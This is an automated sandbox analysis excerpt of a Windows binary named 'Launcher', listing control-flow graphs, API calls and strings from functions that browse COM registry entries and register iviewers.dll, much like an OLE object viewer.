                                                                                                    • StringFromGUID2.OLE32(?,?,00000050), ref: 00676589
                                                                                                    • wsprintfW.USER32 ref: 006765C8
                                                                                                    • RegOpenKeyW.ADVAPI32(80000000,Component Categories,00000000), ref: 00676750
                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00676789
                                                                                                    • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 006767AB
                                                                                                    • RegQueryValueExW.ADVAPI32(?,409,00000000,00000000,?,00000200), ref: 006767E0
                                                                                                    • wsprintfW.USER32 ref: 00676813
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0067690C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Openwsprintf$CloseCreateDefaultEnumFromInstanceQueryStringUserValue
                                                                                                    • String ID: %s <no name>$409$Component Categories$P;g$_%S <no name>$g
                                                                                                    • API String ID: 3086071695-2305516289
                                                                                                    • Opcode ID: a3f909553b41c77af108e962de6afd597954c601d32e1d41e7b4dcf9aa4ef5f9
                                                                                                    • Instruction ID: 80972317153d4a00df6de7aaa693f3403607e779801211be0e2e6012d3428a47
                                                                                                    • Opcode Fuzzy Hash: a3f909553b41c77af108e962de6afd597954c601d32e1d41e7b4dcf9aa4ef5f9
                                                                                                    • Instruction Fuzzy Hash: 1EE1DA71A00629DFDB60DF64DC49BA9B7BABB84315F1041EAE40DE7250DB729EA4CF10

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 66dba0-66dbbe 1 66dbc4-66dbd1 0->1 2 66e15d-66e16b call 67f3a0 0->2 3 66dbd3-66dc1c #6195 #1143 LoadIconW SendMessageW #6195 call 66e409 1->3 4 66dc21-66dc3f #1662 lstrcmpW 1->4 3->2 8 66dc41-66dc98 #6195 * 2 #1143 LoadIconW SendMessageW call 679b32 call 66e466 4->8 9 66dc9d-66dcb8 memcmp 4->9 39 66e156-66e158 #2644 8->39 12 66dcbe-66dccd 9->12 13 66de59-66de8e StringFromGUID2 #6195 * 2 9->13 17 66dce1-66dcee #6195 12->17 18 66dccf-66dcdf #6195 12->18 14 66deb0-66deb3 13->14 15 66de90-66deab call 679b32 call 66e466 13->15 22 66deb5-66decd call 679b32 call 66e466 14->22 23 66ded2-66ded5 14->23 54 66e136-66e142 #1143 LoadIconW 15->54 19 66dcef-66dd30 #1143 LoadIconW SendMessageW #6195 17->19 18->19 24 66dda6-66dda9 19->24 25 66dd32-66dd51 RegOpenKeyExW 19->25 22->54 26 66def7-66defa 23->26 27 66ded7-66def2 call 679b32 call 66e466 23->27 37 66dde7-66dde9 call 66e409 24->37 38 66ddab-66dde5 call 679b32 call 66e466 #1143 LoadIconW SendMessageW 24->38 31 66dd92-66dda4 call 679b32 call 66e466 25->31 32 66dd53-66dd8c #6195 #1143 LoadIconW SendMessageW RegCloseKey 25->32 34 66df00-66df03 26->34 35 66e11e-66e134 call 679b32 call 66e466 26->35 27->54 49 66ddee-66de04 lstrcmpW 31->49 32->31 34->35 44 66df09-66dfbf call 679b32 call 66c6a6 call 670b66 call 66f616 call 66cb16 call 66e1a4 wsprintfW RegOpenKeyExW 34->44 35->54 37->49 38->49 39->2 44->39 80 66dfc5-66dff0 RegQueryValueW 44->80 57 66de06-66de25 #1143 LoadIconW SendMessageW 49->57 58 66de2b-66de3b lstrcmpW 49->58 63 66e144 54->63 57->58 58->39 65 66de41-66de54 #1143 LoadIconW 58->65 69 66e145-66e150 SendMessageW 63->69 65->63 69->39 81 66dff6-66e00a call 67dc89 80->81 82 66e079-66e08e call 66d944 80->82 89 66e00c-66e012 81->89 90 66e01d-66e027 81->90 87 66e090-66e0a5 call 66d944 82->87 88 66e0fe-66e10d RegCloseKey 82->88 87->88 99 66e0a7-66e0bc call 66d944 87->99 91 66e113-66e117 88->91 92 66e10f-66e111 88->92 89->90 94 66e014-66e019 89->94 95 66e057-66e073 #1165 ExtractIconW 90->95 96 66e029-66e050 lstrcpyW wcsrchr 90->96 91->35 92->69 94->90 95->82 95->88 96->95 98 66e052-66e054 96->98 98->95 99->88 102 66e0be-66e0d3 call 66d944 99->102 102->88 105 66e0d5-66e0ea call 66d944 102->105 105->88 108 66e0ec-66e0fc call 66d944 105->108 108->88
                                                                                                    APIs
                                                                                                    • #6195.MFC42U(006621A0), ref: 0066DBDB
                                                                                                    • #1143.MFC42U(00000093,0000000E,00000093,006621A0), ref: 0066DBE9
                                                                                                    • LoadIconW.USER32(00000000,00000093), ref: 0066DBEF
                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0066DC03
                                                                                                    • #6195.MFC42U(006621A0), ref: 0066DC10
                                                                                                      • Part of subcall function 0066E409: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E41E
                                                                                                      • Part of subcall function 0066E409: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E436
                                                                                                      • Part of subcall function 0066E409: SendMessageW.USER32(?,00001309,00000000,00000000), ref: 0066E451
                                                                                                      • Part of subcall function 0066E409: #6211.MFC42U(00000000), ref: 0066E45E
                                                                                                    • #1662.MFC42U ref: 0066DC2A
                                                                                                    • lstrcmpW.KERNEL32(?,Application IDs), ref: 0066DC37
                                                                                                    • #6195.MFC42U(Application IDs), ref: 0066DC4C
                                                                                                    • #6195.MFC42U(All HKEY_CLASSES_ROOT\APPID Entries,Application IDs), ref: 0066DC58
                                                                                                    • #1143.MFC42U(00000094,0000000E,00000094,All HKEY_CLASSES_ROOT\APPID Entries,Application IDs), ref: 0066DC66
                                                                                                    • LoadIconW.USER32(00000000,00000094), ref: 0066DC6C
                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0066DC80
                                                                                                    • #2644.MFC42U ref: 0066E158
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#6195$#1143IconLoad$#1662#2644#6211lstrcmp
                                                                                                    • String ID: All HKEY_CLASSES_ROOT\APPID Entries$All HKEY_CLASSES_ROOT\Component Categories Entries$Application IDs$CLSID\%s$Component Categories$DefaultIcon$InprocHandler$InprocHandler32$InprocServer$InprocServer32$Interfaces$LocalServer$LocalServer32$No CLSID available.$Type Libraries
                                                                                                    • API String ID: 3415864282-4228781962
                                                                                                    • Opcode ID: 5212b289fb0e4ea10df026081e6f73dd826e7b35fd4c381f64c5c73648aa97a2
                                                                                                    • Instruction ID: e9e78dcf3b830e846a50ef23dc5b81bf15a2c4301349f98a1cacbaf132f58090
                                                                                                    • Opcode Fuzzy Hash: 5212b289fb0e4ea10df026081e6f73dd826e7b35fd4c381f64c5c73648aa97a2
                                                                                                    • Instruction Fuzzy Hash: 0AE1D371A40215BBEB60AF30CC4AFAA377BEF45710F0145B8F90DAB192DF7599448B68

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 111 66f616-66f6a7 call 67f415 #540 StringFromGUID2 SendMessageW call 67d67d 116 66f6ae-66f6fa #861 call 67d67d 111->116 117 66f6a9 111->117 120 66f6fe-66f715 #6195 116->120 121 66f6fc 116->121 117->116 122 66f98d-66f9cd call 67d67d 120->122 123 66f71b-66f71e 120->123 121->120 131 66f9d4-66f9f1 #861 #2756 122->131 132 66f9cf 122->132 125 66f944-66f97b call 67d67d 123->125 126 66f724-66f727 123->126 142 66f982 125->142 143 66f97d 125->143 128 66f7f7-66f82e call 67d67d 126->128 129 66f72d-66f730 126->129 145 66f830-66f846 #861 128->145 146 66f84c-66f856 #861 128->146 134 66f736-66f782 #3087 #2634 call 67d67d 129->134 135 66fc33-66fc3c call 66f090 call 67020e 129->135 139 66f9f3-66fa02 #2756 131->139 140 66fa1b-66fa6e SendMessageW call 67d67d 131->140 132->131 156 66f784 134->156 157 66f789-66f7d0 #861 call 67d67d 134->157 159 66fc41-66fc5a #6330 #800 call 67f3c4 135->159 139->140 147 66fa04-66fa19 SendMessageW 139->147 153 66fa82-66fad1 #2634 call 67d67d 140->153 161 66fa70-66fa7d #861 140->161 142->122 143->142 151 66f863-66f898 call 67d67d 145->151 152 66f848-66f84a 145->152 154 66f858-66f85e #2634 146->154 147->153 172 66f927 151->172 173 66f89e-66f8b2 lstrcmpiW 151->173 152->154 167 66fad7-66faeb lstrcmpiW 153->167 168 66fb60 153->168 154->151 156->157 169 66f7d7-66f7f2 #861 #2634 157->169 170 66f7d2 157->170 161->153 174 66faf4-66fb08 lstrcmpiW 167->174 175 66faed-66faf2 167->175 178 66fb65-66fb6c 168->178 176 66fc28-66fc2e #2634 169->176 170->169 177 66f92c-66f933 172->177 179 66f8b4-66f8b9 173->179 180 66f8bb-66f8cf lstrcmpiW 173->180 183 66fb11-66fb25 lstrcmpiW 174->183 184 66fb0a-66fb0f 174->184 175->178 176->135 185 66f939 SendMessageW 177->185 186 66fb72-66fbb5 SendMessageW call 67d605 178->186 179->177 181 66f8d1-66f8d6 180->181 182 66f8d8-66f8ec lstrcmpiW 180->182 181->177 187 66f8f5-66f90f lstrcmpiW 182->187 188 66f8ee-66f8f3 182->188 189 66fb27-66fb2c 183->189 190 66fb2e-66fb48 lstrcmpiW 183->190 184->178 185->125 199 66fbb7-66fbce SendMessageW 186->199 200 66fbd0-66fbe0 SendMessageW 186->200 192 66f920-66f925 187->192 193 66f911 187->193 188->177 189->178 194 66fb4a 190->194 195 66fb59-66fb5e 190->195 197 66f916-66f91e 192->197 193->197 198 66fb4f-66fb57 194->198 195->198 197->185 198->186 201 66fbe5-66fc26 #861 #3087 #2634 #3087 #2634 * 2 199->201 200->201 201->176
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0066F620
                                                                                                    • #540.MFC42U(0000025C,0066DF5F), ref: 0066F637
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,0000025C,0066DF5F), ref: 0066F64D
                                                                                                    • SendMessageW.USER32(?,0000014D,000000FF,None), ref: 0066F669
                                                                                                    • #861.MFC42U(?), ref: 0066F6B5
                                                                                                    • #6195.MFC42U(?,?,?,?,?), ref: 0066F705
                                                                                                    • #3087.MFC42U(0000008B,00000001,?,?,?,?,?), ref: 0066F73F
                                                                                                    • #2634.MFC42U(0000008B,00000001,?,?,?,?,?), ref: 0066F746
                                                                                                    • #861.MFC42U(?,?,0000008B,00000001,?,?,?,?,?), ref: 0066F790
                                                                                                    • #861.MFC42U(?,?,?,?,?,?,0000008B,00000001,?,?,?,?,?), ref: 0066F7DE
                                                                                                    • #2634.MFC42U(00000000,?,?,?,?,?,?,0000008B,00000001,?,?,?,?,?), ref: 0066F7EB
                                                                                                    • #861.MFC42U(?,006621A0,?,00000100,?,?,?,?,?), ref: 0066F837
                                                                                                    • #861.MFC42U(006621A0,006621A0,?,00000100,?,?,?,?,?), ref: 0066F851
                                                                                                    • #2634.MFC42U(00000000,006621A0,006621A0,?,00000100,?,?,?,?,?), ref: 0066F85E
                                                                                                    • lstrcmpiW.KERNEL32(?,BOTH,?,?,00000000,006621A0,006621A0,?,00000100,?,?,?,?,?), ref: 0066F8AA
                                                                                                    • lstrcmpiW.KERNEL32(?,FREE,?,?,00000000,006621A0,006621A0,?,00000100,?,?,?,?,?), ref: 0066F8C7
                                                                                                    • lstrcmpiW.KERNEL32(?,APARTMENT,?,?,00000000,006621A0,006621A0,?,00000100,?,?,?,?,?), ref: 0066F8E4
                                                                                                    • lstrcmpiW.KERNEL32(?,NEUTRAL,?,?,00000000,006621A0,006621A0,?,00000100,?,?,?,?,?), ref: 0066F901
                                                                                                    • SendMessageW.USER32(?,0000014D,000000FF,None), ref: 0066F939
                                                                                                    • #861.MFC42U(?,006621A0,?,00000100,?,?,?,?,?), ref: 0066F9DD
                                                                                                    • #2756.MFC42U(msjava.dll,?,006621A0,?,00000100,?,?,?,?,?), ref: 0066F9E9
                                                                                                    • #2756.MFC42U(MSJAVA.DLL,msjava.dll,?,006621A0,?,00000100,?,?,?,?,?), ref: 0066F9FA
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0066FA13
                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0066FA2A
                                                                                                    • #861.MFC42U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0066FA7D
                                                                                                    • #2634.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0066FA97
                                                                                                    • lstrcmpiW.KERNEL32(?,BOTH,?,?,?,00000000), ref: 0066FAE3
                                                                                                    • lstrcmpiW.KERNEL32(?,FREE,?,?,?,00000000), ref: 0066FB00
                                                                                                    • lstrcmpiW.KERNEL32(?,APARTMENT,?,?,?,00000000), ref: 0066FB1D
                                                                                                    • lstrcmpiW.KERNEL32(?,NEUTRAL,?,?,?,00000000), ref: 0066FB3A
                                                                                                    • SendMessageW.USER32(?,0000014D,000000FF,None), ref: 0066FB72
                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0066FBBF
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0066FBD8
                                                                                                    • #861.MFC42U(006621A0,?,?,?,?,?,?,?,00000000), ref: 0066FBEC
                                                                                                    • #3087.MFC42U(00001FA5,006621A0,?,?,?,?,?,?,?,00000000), ref: 0066FBF8
                                                                                                    • #2634.MFC42U(00000000,00001FA5,006621A0,?,?,?,?,?,?,?,00000000), ref: 0066FC00
                                                                                                    • #3087.MFC42U(0000009C,00000000,00001FA5,006621A0,?,?,?,?,?,?,?,00000000), ref: 0066FC0C
                                                                                                    • #2634.MFC42U(00000000,0000009C,00000000,00001FA5,006621A0,?,?,?,?,?,?,?,00000000), ref: 0066FC14
                                                                                                    • #2634.MFC42U(00000001,00000000,0000009C,00000000,00001FA5,006621A0,?,?,?,?,?,?,?,00000000), ref: 0066FC21
                                                                                                    • #2634.MFC42U(00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0,?,?,?,?,?,?,?,00000000), ref: 0066FC2E
                                                                                                    • #6330.MFC42U(00000000,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0,?,?,?,?,?,?,?,00000000), ref: 0066FC45
                                                                                                    • #800.MFC42U(00000000,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0,?,?,?,?,?,?,?,00000000), ref: 0066FC50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2634#861lstrcmpi$MessageSend$#3087$#2756$#540#6195#6330#800FromH_prolog3_String
                                                                                                    • String ID: APARTMENT$Apartment$AppID$BOTH$Both$DllSurrogate$FREE$Free$InProcHandler32$InProcServer32$JavaClass$LocalServer32$LocalService$MSJAVA.DLL$NEUTRAL$Neutral$None$ServiceParameters$ThreadingModel$TreatAs$msjava.dll
                                                                                                    • API String ID: 3203418238-4284008715
                                                                                                    • Opcode ID: cbfd7791027747473e1bd2e6b1f2c7343d90d2e3d63c6e736bbbc57e0847898d
                                                                                                    • Instruction ID: 21b5ac9cd98f482abbfc46e70b9ffb655c9a4115fb51790162247187207e1c2a
                                                                                                    • Opcode Fuzzy Hash: cbfd7791027747473e1bd2e6b1f2c7343d90d2e3d63c6e736bbbc57e0847898d
                                                                                                    • Instruction Fuzzy Hash: 14F1C531640319E7DB11EF20CD8AFEA377BAF15700F4106F9B909AB291DBB19A488B54

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0066BBA0
                                                                                                    • #540.MFC42U(00000A30,00671EC1,00000000,?,00000001), ref: 0066BBB4
                                                                                                    • #4155.MFC42U(00000004,00000A30,00671EC1,00000000,?,00000001), ref: 0066BBC6
                                                                                                    • StringFromGUID2.OLE32(00661980,?), ref: 0066BBEB
                                                                                                    • wsprintfW.USER32 ref: 0066BC04
                                                                                                    • RegQueryValueW.ADVAPI32(80000000,?,?,?), ref: 0066BC27
                                                                                                    • #3516.MFC42U(?,Version,00000000), ref: 0066BC42
                                                                                                    • #540.MFC42U(00000004,00000A30,00671EC1,00000000,?,00000001), ref: 0066BC56
                                                                                                    • #540.MFC42U(00000004,00000A30,00671EC1,00000000,?,00000001), ref: 0066BC64
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,00000004,00000A30,00671EC1,00000000,?,00000001), ref: 0066BC7A
                                                                                                    • wcsrchr.MSVCRT ref: 0066BC92
                                                                                                    • lstrcpyW.KERNEL32(-00000002,IVIEWERS.DLL), ref: 0066BCA3
                                                                                                    • #538.MFC42U(?), ref: 0066BCB6
                                                                                                    • #4155.MFC42U(00000012), ref: 0066BCD2
                                                                                                    • #4155.MFC42U(00000013,00000012), ref: 0066BCDF
                                                                                                    • #940.MFC42U(?,00000013,00000012), ref: 0066BCF1
                                                                                                    • #4155.MFC42U(00000015,?,00000013,00000012), ref: 0066BCFE
                                                                                                    • #940.MFC42U(?,00000015,?,00000013,00000012), ref: 0066BD10
                                                                                                    • #1197.MFC42U(?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BD1F
                                                                                                    • #355.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BD4B
                                                                                                    • #2507.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BD5A
                                                                                                    • #3494.MFC42U(?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BD74
                                                                                                    • #858.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BD84
                                                                                                    • #800.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BD8F
                                                                                                    • #800.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BD9E
                                                                                                    • #641.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BDA9
                                                                                                    • LoadLibraryW.KERNEL32(?,?), ref: 0066BDB4
                                                                                                    • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 0066BDCB
                                                                                                    • #800.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BDF3
                                                                                                    • #641.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BDFE
                                                                                                    • #4155.MFC42U(00000014), ref: 0066BE11
                                                                                                    • #4155.MFC42U(00000013,00000014), ref: 0066BE1E
                                                                                                    • #940.MFC42U(?,00000013,00000014), ref: 0066BE30
                                                                                                    • #1197.MFC42U(?,00000000,00000000,?,00000013,00000014), ref: 0066BE3F
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000000,?,00000013,00000014), ref: 0066BE4B
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,Interface,00000000,000F003F,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 0066BE69
                                                                                                    • StringFromGUID2.OLE32(00669E6C,?,00000031), ref: 0066BE84
                                                                                                    • StringFromGUID2.OLE32(00669E7C,?,00000031,?,?,00000000,IClientSecurity), ref: 0066BEAA
                                                                                                    • StringFromGUID2.OLE32(00669E8C,?,00000031,?,?,00000000,IServerSecurity), ref: 0066BED0
                                                                                                    • StringFromGUID2.OLE32(00669E5C,?,00000031,?,?,00000000,IMallocSpy), ref: 0066BEF6
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,IMultiQI), ref: 0066BF18
                                                                                                    • #6398.MFC42U(?,Version,0000003D), ref: 0066BF34
                                                                                                    • #800.MFC42U(?,Version,0000003D), ref: 0066BF3F
                                                                                                    • #800.MFC42U(?,Version,0000003D), ref: 0066BF4A
                                                                                                    • #800.MFC42U(?,Version,0000003D), ref: 0066BF55
                                                                                                    • #800.MFC42U(?,Version,0000003D), ref: 0066BF62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#4155$FromString$#540#940$#1197#641Library$#2507#3494#3516#355#538#6398#858AddressCloseFileFreeH_prolog3_LoadModuleNameOpenProcQueryValuelstrcpywcsrchrwsprintf
                                                                                                    • String ID: Component Categories\%s$DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|$DllRegisterServer$IClientSecurity$IMallocSpy$IMultiQI$IServerSecurity$IVIEWERS.DLL$Interface$Version$iviewers.dll
                                                                                                    • API String ID: 2887186624-2619698232
                                                                                                    • Opcode ID: 107691f1a21fd59d973a00cf790919fc269f2654764244e3b57b7a05fa08b1e3
                                                                                                    • Instruction ID: beb19dad828089a52a41b94c8ae9c28c60d1bae5878dbaa2d3803a1b03cea934
                                                                                                    • Opcode Fuzzy Hash: 107691f1a21fd59d973a00cf790919fc269f2654764244e3b57b7a05fa08b1e3
                                                                                                    • Instruction Fuzzy Hash: 5EA19F32A40318AADB61EB60CC56FDD777AAF1A700F1045A9F20AB6091DF715F89CF16

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 240 677a11-677a3e 241 677a47-677a67 CLSIDFromString 240->241 242 677a40-677a42 240->242 244 677a70-677ab0 wsprintfW RegOpenKeyW 241->244 245 677a69-677a6b 241->245 243 677efd-677f08 call 67f3a0 242->243 247 677ab6-677ace call 6779b1 244->247 248 677efb 244->248 245->243 252 677ad0-677add 247->252 253 677adf-677ae5 247->253 248->243 254 677aec-677b17 RegQueryValueW 252->254 253->254 255 677b1d-677b36 _wcsnicmp 254->255 256 677bb8-677bd9 RegQueryValueW 254->256 257 677bb3 255->257 258 677b38-677b4c lstrcmpiW 255->258 259 677c42-677c5c RegOpenKeyW 256->259 260 677bdb-677bf4 _wcsnicmp 256->260 257->259 263 677ba6-677bac 258->263 264 677b4e-677b62 lstrcmpiW 258->264 261 677c5e-677c65 259->261 262 677c99-677cb3 RegOpenKeyW 259->262 260->259 265 677bf6-677c0a lstrcmpiW 260->265 268 677c67-677c74 261->268 269 677c76-677c7c 261->269 271 677cb5-677cbc 262->271 272 677cf0-677d0a RegOpenKeyW 262->272 263->257 264->263 270 677b64-677b78 lstrcmpiW 264->270 266 677c0c-677c20 lstrcmpiW 265->266 267 677c38-677c3e 265->267 266->267 273 677c22-677c36 lstrcmpiW 266->273 267->259 274 677c83-677c8f RegCloseKey 268->274 269->274 270->263 275 677b7a-677b8e lstrcmpiW 270->275 276 677cbe-677ccb 271->276 277 677ccd-677cd3 271->277 278 677d47-677d81 RegCloseKey RegQueryValueW 272->278 279 677d0c-677d13 272->279 273->259 273->267 281 677e65-677ea2 RegQueryValueW 274->281 275->263 282 677b90-677ba4 lstrcmpiW 275->282 283 677cda-677ce6 RegCloseKey 276->283 277->283 280 677d87-677dc1 wsprintfW RegOpenKeyW 278->280 278->281 284 677d15-677d22 279->284 285 677d24-677d2a 279->285 287 677dc3-677dca 280->287 288 677df8-677e32 wsprintfW RegOpenKeyW 280->288 289 677ec7-677eda #861 281->289 290 677ea4-677ec5 RegQueryValueW 281->290 282->257 282->263 283->281 286 677d31-677d3d RegCloseKey 284->286 285->286 286->281 292 677dcc-677dd9 287->292 293 677ddb-677de1 287->293 288->281 294 677e34-677e3b 288->294 291 677edf-677ee6 289->291 290->289 290->291 295 677ef4-677ef7 291->295 296 677ee8-677eee RegCloseKey 291->296 297 677de8-677df4 RegCloseKey 292->297 293->297 298 677e3d-677e4a 294->298 299 677e4c-677e52 294->299 295->243 296->295 297->281 300 677e59-677e5f RegCloseKey 298->300 299->300 300->281
                                                                                                    APIs
                                                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 00677A54
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FromString
                                                                                                    • String ID: %s\Insertable$%s\NotInsertable$($2.dll$2disp.dll$2pr32.dll$2prox.dll$32.dll$CLSID\%s$Control$InprocServer$InprocServer32$Insertable$Ole1Class$ProgID$ToolboxBitmap$ToolboxBitmap32$aut32.dll$cnv32.dll$ole$prx32.dll
                                                                                                    • API String ID: 1694596556-344945948
                                                                                                    • Opcode ID: 0239e0186e1f8d5529948de8cbfde6d8e202c8e919db5b44b259a54d924f15b1
                                                                                                    • Instruction ID: 3eac9a99e6db90085c06f13c5e3f221a88f9743f5d2bade28d43359111ef8814
                                                                                                    • Opcode Fuzzy Hash: 0239e0186e1f8d5529948de8cbfde6d8e202c8e919db5b44b259a54d924f15b1
                                                                                                    • Instruction Fuzzy Hash: 7BD114B1A4421DEFDB20DF60DC8DBDAB7BABB14305F0046E5E519E2261DB709E859F20

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • #3087.MFC42U(000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0067024A
                                                                                                    • #6211.MFC42U(000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 00670251
                                                                                                    • #3087.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0067025E
                                                                                                    • #6211.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 00670265
                                                                                                    • #3087.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00670272
                                                                                                    • #6211.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00670279
                                                                                                    • #3087.MFC42U(0000008B,00000005,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C), ref: 00670289
